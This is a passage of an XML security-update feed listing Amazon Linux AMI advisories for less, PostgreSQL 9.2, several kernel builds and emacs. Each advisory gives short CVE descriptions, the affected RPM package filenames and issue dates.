epoch="0" arch="i686"><filename>Packages/perf-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-195.582.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1958</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1958: important priority package update for less</title><issued date="2025-01-30 04:16:00" /><updated date="2025-02-05 10:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-32487:
less through 653 allows OS command execution via a newline character in the name of a file, because quoting is mishandled in filename.c. Exploitation typically requires use with attacker-controlled file names, such as the files extracted from an untrusted archive. Exploitation also requires the LESSOPEN environment variable, but this is set by default in many common cases.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32487" title="" id="CVE-2024-32487" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="less-debuginfo" version="436" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/less-debuginfo-436-13.14.amzn1.x86_64.rpm</filename></package><package name="less" version="436" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/less-436-13.14.amzn1.x86_64.rpm</filename></package><package name="less" version="436" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/less-436-13.14.amzn1.i686.rpm</filename></package><package name="less-debuginfo" version="436" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/less-debuginfo-436-13.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1959</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1959: important priority package update for postgresql92</title><issued date="2025-01-30 04:16:00" /><updated date="2025-02-05 10:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-7348:
Time-of-check Time-of-use (TOCTOU) race condition in pg_dump in PostgreSQL allows an object creator to execute arbitrary SQL functions as the user running pg_dump, which is often a superuser. The attack involves replacing another relation type with a view or foreign table. The attack requires waiting for pg_dump to start, but winning the race condition is trivial if the attacker retains an open transaction. Versions before PostgreSQL 16.4, 15.8, 14.13, 13.16, and 12.20 are affected.
CVE-2023-5869:
While modifying certain SQL array values, missing overflow checks let authenticated database users write arbitrary bytes to a memory area that facilitates arbitrary code execution. Missing overflow checks also let authenticated database users read a wide area of server memory. The CVE-2021-32027 fix covered some attacks of this description, but it missed others.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5869" title="" id="CVE-2023-5869" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7348" title="" id="CVE-2024-7348" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-server-compat" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.24-3.70.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1960</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1960: important priority package update for kernel</title><issued date="2025-02-13 03:06:00" /><updated date="2025-02-18 17:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-50055:
In the Linux kernel, the following vulnerability has been resolved:
driver core: bus: Fix double free in driver API bus_register()
CVE-2024-49860:
In the Linux kernel, the following vulnerability has been resolved:
ACPI: sysfs: validate return type of _STR method
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49860" title="" id="CVE-2024-49860" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50055" title="" id="CVE-2024-50055" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-195.591.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1961</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1961: important priority package update for kernel</title><issued date="2025-02-27 23:43:00" /><updated date="2025-03-06 10:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-56642:
In the Linux kernel, the following vulnerability has been resolved:
tipc: Fix use-after-free of kernel socket in cleanup_bearer().
CVE-2024-56631:
In the Linux kernel, the following vulnerability has been resolved:
scsi: sg: Fix slab-use-after-free read in sg_release()
CVE-2024-50279:
In the Linux kernel, the following vulnerability has been resolved:
dm cache: fix out-of-bounds access to the dirty bitset when resizing
CVE-2024-50143:
In the Linux kernel, the following vulnerability has been resolved:
udf: fix uninit-value use in udf_get_fileshortad
CVE-2024-50035:
In the Linux kernel, the following vulnerability has been resolved:
ppp: fix ppp_async_encode() illegal access
CVE-2024-49995:
In the Linux kernel, the following vulnerability has been resolved:
tipc: guard against string buffer overrun
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49995" title="" id="CVE-2024-49995" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50035" title="" id="CVE-2024-50035" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50143" title="" id="CVE-2024-50143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50279" title="" id="CVE-2024-50279" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56631" title="" id="CVE-2024-56631" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56642" title="" id="CVE-2024-56642" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-194.598.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1962</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1962: important priority package update for kernel</title><issued date="2025-02-27 23:43:00" /><updated date="2025-03-13 20:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-43882:
In the Linux kernel, the following vulnerability has been resolved:
exec: Fix ToCToU between perm check and set-uid/gid usage
CVE-2024-42285:
In the Linux kernel, the following vulnerability has been resolved:
RDMA/iwcm: Fix a use-after-free related to destroying CM IDs
CVE-2024-42284:
In the Linux kernel, the following vulnerability has been resolved:
tipc: Return non-zero value from tipc_udp_addr2str() on error
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42284" title="" id="CVE-2024-42284" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42285" title="" id="CVE-2024-42285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43882" title="" id="CVE-2024-43882" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.353-190.569.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1963</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1963: important priority package update for kernel</title><issued date="2025-02-27 23:43:00" /><updated date="2025-03-13 20:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-42104:
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: add missing check for inode numbers on directory entries
CVE-2024-39487:
In the Linux kernel, the following vulnerability has been resolved:
bonding: Fix out-of-bounds read in bond_option_arp_ip_targets_set()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39487" title="" id="CVE-2024-39487" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42104" title="" id="CVE-2024-42104" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.352" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.352-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.352-190.569.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.352" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.352-190.569.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1964</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1964: important priority package update for emacs</title><issued date="2025-03-13 20:58:00" /><updated date="2025-03-17 22:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-1244:
A flaw was found in the Emacs text editor. Improper handling of custom "man" URI schemes allows attackers to execute arbitrary shell commands by tricking users into visiting a specially crafted website or an HTTP URL with a redirect.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1244" title="" id="CVE-2025-1244" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="emacs-common" version="24.3" release="20.26.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-common-24.3-20.26.amzn1.x86_64.rpm</filename></package><package name="emacs-debuginfo" version="24.3" release="20.26.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-debuginfo-24.3-20.26.amzn1.x86_64.rpm</filename></package><package name="emacs" version="24.3" release="20.26.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-24.3-20.26.amzn1.x86_64.rpm</filename></package><package name="emacs-el" version="24.3" release="20.26.amzn1" epoch="1" arch="noarch"><filename>Packages/emacs-el-24.3-20.26.amzn1.noarch.rpm</filename></package><package name="emacs-common" version="24.3" release="20.26.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-common-24.3-20.26.amzn1.i686.rpm</filename></package><package name="emacs-debuginfo" version="24.3" release="20.26.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-debuginfo-24.3-20.26.amzn1.i686.rpm</filename></package><package name="emacs" version="24.3" release="20.26.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-24.3-20.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 